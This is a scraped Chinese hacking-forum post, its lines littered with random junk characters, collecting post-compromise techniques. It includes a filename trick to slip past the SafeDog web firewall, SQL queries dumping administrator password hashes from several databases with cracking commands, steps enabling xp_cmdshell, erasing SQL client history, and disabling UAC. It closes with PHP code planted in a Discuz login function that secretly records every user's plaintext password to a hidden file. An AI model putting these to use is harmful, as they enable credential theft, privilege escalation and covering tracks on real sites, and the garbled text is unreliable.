0 a U; c( w, C其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
& u# P: s! G* e1 F利用II6文件解析漏洞绕过安全狗代码:1 o/ V7 l, t! p4 Z! k" {0 L
;antian365.asp;antian365.jpg
q3 ^- ?; V0 v' Q) v+ U0 }- J
! w& g r+ m5 n: w/ b- B( r各种类型数据库抓HASH破解最高权限密码!
. t. w6 o i; T( ?1 i1.sql server2000$ I- W: ~ s( J3 W
SELECT password from master.dbo.sysxlogins where name='sa'
8 \2 q- t, O4 G2 H" `4 u; y0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503417 H/ v7 d X1 ~" R
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A. E- n1 @. p+ z& H& v5 a* w
# `- C% b! `8 [; ]/ U1 f
0×0100- constant header
6 D4 {( M6 L3 o1 Y9 ]/ J7 z34767D5C- salt) [! w* I. ~$ T
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
" B" c, V, A7 ?: E/ D2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash5 D$ n. X r0 E% Y1 _! B: {3 ~
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash6 ]* r( g, a y* B+ s" C+ |' M, {+ ~% ~
SQL server 2005:-
( S* P4 ?0 S- f# A) Y3 q7 ASELECT password_hash FROM sys.sql_logins where name='sa'. |6 H1 p& b0 N. l Z
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
$ i' \$ P* P. w0×0100- constant header1 |2 P; Q- y) Q
993BF231-salt
$ W; @# n& {8 e! v: R5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
# w6 W7 [% g& B/ o) [crack case sensitive hash in cain, try brute force and dictionary based attacks.
. ^6 S* M. W8 L/ J6 T2 H1 M, d* _; q- k0 S( x/ Q2 [
update:- following bernardo’s comments:-
* P! I; G7 `- I, Tuse function fn_varbintohexstr() to cast password in a hex string." S9 m/ e7 a% V6 e
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins: c8 w! y) Z7 Q9 M: g/ G7 e, q
9 n8 C' P/ R7 a) i3 J" ?MYSQL:-
: j+ t" _4 P5 `+ d
6 e; k- G. z% HIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.+ j" p6 C& [" `# `8 _& v0 ~
$ W: C4 @% Y V7 J
*mysql < 4.1
3 j! k3 \, k; O+ e* V6 n% [) r5 f( w+ P7 B Z' g
mysql> SELECT PASSWORD(‘mypass’);
, C) f, R$ d8 Q# R! O+——————–+
& J6 M# j, q9 \. I| PASSWORD(‘mypass’) |
$ b( \1 ?$ G7 v( y2 w+——————–+
2 {9 @: k/ \/ ^+ ]3 O9 ^8 ?| 6f8c114b58f2ce9e |
3 v* u8 s5 R# s9 i2 t5 a+——————–+
$ ^. z& e. W! a5 l$ R4 h( |4 o2 V8 ~5 @! j$ [
*mysql >=4.1; ?8 d% b' Z5 K: Q, E8 ?
* Y8 c9 b, Y9 |: z) N$ A# P
mysql> SELECT PASSWORD(‘mypass’);
! G2 r9 Z* x; n/ k( d+——————————————-+
, a, c9 V+ L' z! l, F/ b| PASSWORD(‘mypass’) |' q) }: F1 i9 G% \% U/ a" v
+——————————————-+7 @$ |/ h2 ] R+ ]% E' j
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
; F% e T. L" i1 M7 o" g7 x+——————————————-+5 J4 |/ c1 @9 \4 m* C& w
) B) u) l9 O( Y; a: \+ ^$ E- N! }Select user, password from mysql.user
. E7 T0 C1 P5 ]) h( ^The hashes can be cracked in ‘cain and abel’
! W/ k. ]* h+ L+ M2 x. w
) C& k0 r! ~) ?7 f5 z! I/ PPostgres:-# ?! L$ f- p, n# G C+ c" S6 o
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”): B# U9 O4 s0 \& q8 |$ E
select usename, passwd from pg_shadow;5 H, I/ R5 o- [6 [$ V0 z; g+ R
usename | passwd8 Z/ a# z# G1 f+ J& y# ~4 M' Q
——————+————————————-$ n7 B1 {5 U: \! C
testuser | md5fabb6d7172aadfda4753bf0507ed4396
* N+ B) D: X' x$ D, ?7 ~; xuse mdcrack to crack these hashes:-
4 F7 r9 J+ L8 P- l, I' f' T) d$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396* u# F: E( ?; }
- @2 ~: Q/ s1 oOracle:-8 Q5 P5 @+ M+ @, F% F
select name, password, spare4 from sys.user$
$ `+ H0 q: a9 B$ ~* `% j! V6 o' phashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
+ c/ m: w- s* f. }7 ^$ DMore on Oracle later, i am a bit bored….8 u+ k9 Z" X! n F! ?6 e
$ o8 C) W& H/ F5 t; \' J. o( y$ ^; L
在sql server2005/2008中开启xp_cmdshell+ r' `8 b% h9 n2 p3 V) S# R
-- To allow advanced options to be changed.
" w$ @ M2 b2 j" A# _EXEC sp_configure 'show advanced options', 17 y8 ?, x0 P# O8 W
GO+ x `. N( C& ~. u _9 d5 O! `3 b: s
-- To update the currently configured value for advanced options.) A" Z7 h6 D8 v4 i/ A& y
RECONFIGURE
" s1 D, p/ {* z/ ?: W$ O! S0 C5 x3 QGO( H* t% ^4 ]5 g/ M6 d
-- To enable the feature.
) }" e" E; c. W7 w: ~1 ^7 h" v! G8 `/ OEXEC sp_configure 'xp_cmdshell', 1: L9 j0 [# G, s$ P8 G1 T9 t
GO/ y7 w; X0 E3 a% M) }: q- i
-- To update the currently configured value for this feature.
; a/ t5 a: @9 A7 V' W# M( K3 `; SRECONFIGURE. A8 h! K* s {+ q$ [" J3 s
GO
4 G4 K; o/ r! bSQL 2008 server日志清除,在清楚前一定要备份。
) R' Q# V: t6 P4 i& x3 T* G如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:6 b/ v% ?1 [; o7 L3 u2 y; ^
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin3 _+ ^) `0 t" t
' S) U; O5 |% j对于SQL Server 2008以前的版本:: b3 }% M7 \5 y1 b
SQL Server 2005:* \1 `. o2 J0 y
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat5 A" R7 T' [% T3 @; k, a% f
SQL Server 2000:
! w& N% b6 l5 _+ z4 p8 j! r清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。3 k# @$ {! F& \7 S" A3 v
; n( }' A7 x- F3 @6 M本帖最后由 simeon 于 2013-1-3 09:51 编辑9 @! v9 W5 }" `! Y( R
1 l5 ~0 O* x* C! ~5 k
, u( L" L N: V& N4 i0 K- |windows 2008 文件权限修改
4 ]- p0 N* ~/ g1 v/ z2 [1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
' X4 p" @5 d. ?1 P2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad987 h1 ]! l) r7 W7 S" j2 x+ K0 I: k
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,2 v/ r t; \8 S( G K7 t3 X8 j6 t& q
# q. f) W3 G" }" oWindows Registry Editor Version 5.00
4 c+ @& ]. V) r n- t/ I[HKEY_CLASSES_ROOT\*\shell\runas]
/ z' |( |8 O+ P. u7 k* Y@="管理员取得所有权"
: h! j3 Q9 v. V5 D: N"NoWorkingDirectory"=""
; x) V7 X0 G S& T* y4 k* z[HKEY_CLASSES_ROOT\*\shell\runas\command]8 n) ]5 }- C1 t2 t+ |( g$ H
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 J$ ]- B% S- V$ H7 W; W: T
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& e2 }+ p; p# z" j4 n
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
& k0 q) ?: E I* j@="管理员取得所有权"
6 X5 r2 S8 E. ^6 c4 q/ s0 k( a"NoWorkingDirectory"=""" {# h/ m, d* {( U$ r& m+ ^+ w
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
: y) F9 e* Y& L: h5 S* C0 c, u5 s( V@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# E# c+ ]$ D' y3 q* G8 u5 |"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 V& c$ y( ] ^7 |
5 A- Y3 N, Y, n# H; I1 r
[HKEY_CLASSES_ROOT\Directory\shell\runas]
6 e: p/ C2 G6 p d@="管理员取得所有权"4 _7 n- J& n' ~3 c- `3 K8 C
"NoWorkingDirectory"=""& S- R9 R# @- ?
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
8 R( d# B6 A. P( p@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"9 d7 {( P; ` @7 X
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
* w3 ~8 }* Y5 l3 F
' S3 ~ b7 v% l3 {4 _
+ s# f3 h( ^9 swin7右键“管理员取得所有权”.reg导入
- ?/ g6 G- v% _二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
% ^1 I) L+ {# g% L2 m1 K; ?1、C:\Windows这个路径的“notepad.exe”不需要替换
" a6 ^' T0 w) P% H O8 V' T: p! L2、C:\Windows\System32这个路径的“notepad.exe”不需要替换6 `' K! x6 F. ~/ k
3、四个“notepad.exe.mui”不要管
: a, i2 G9 k* f' `* O4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和5 H- h7 O: L8 E$ h0 k
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
4 i# B% h. n- k替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
+ C0 {, b# E3 _替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
7 U. @. G# Z9 I$ \windows 2008中关闭安全策略:
% W# P5 Q @# H' ^+ \# S6 t. p4 zreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8 c: ?" G/ }; D/ z. n4 T
修改uc_client目录下的client.php 在! Y$ N+ x4 b5 K N1 ]( Q
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {* y( g: Q" ]7 {( g
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
5 `* v) W; E% I, R5 n6 T你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw* U6 Y: t4 g* y1 d6 m
if(getenv('HTTP_CLIENT_IP')) {# P+ u- u! H0 r0 ~8 ?" }
$onlineip = getenv('HTTP_CLIENT_IP');# X7 K9 S' m$ V2 a1 d( D
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
) {2 }( M& f1 M o, G$onlineip = getenv('HTTP_X_FORWARDED_FOR');
1 s" J# Z7 F6 x' A- m* u6 p8 F% P} elseif(getenv('REMOTE_ADDR')) {1 A( h: c/ M/ o2 i; |; S0 ]2 v
$onlineip = getenv('REMOTE_ADDR');! f0 n$ s/ D) w) \/ s! r
} else {
5 q j2 N" X4 _# G) Y- g$ x+ O$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];5 h" z3 y% j) J+ j% H3 g; S
}4 b5 J, t% } H$ p' U3 S$ Z
$showtime=date("Y-m-d H:i:s");; S9 H( K3 Z/ G) l: A+ n- _! F
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";2 R7 j4 `$ {6 m7 z, f& J
$handle=fopen('./data/cache/csslog.php','a+');$ E C+ c8 |4 o
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对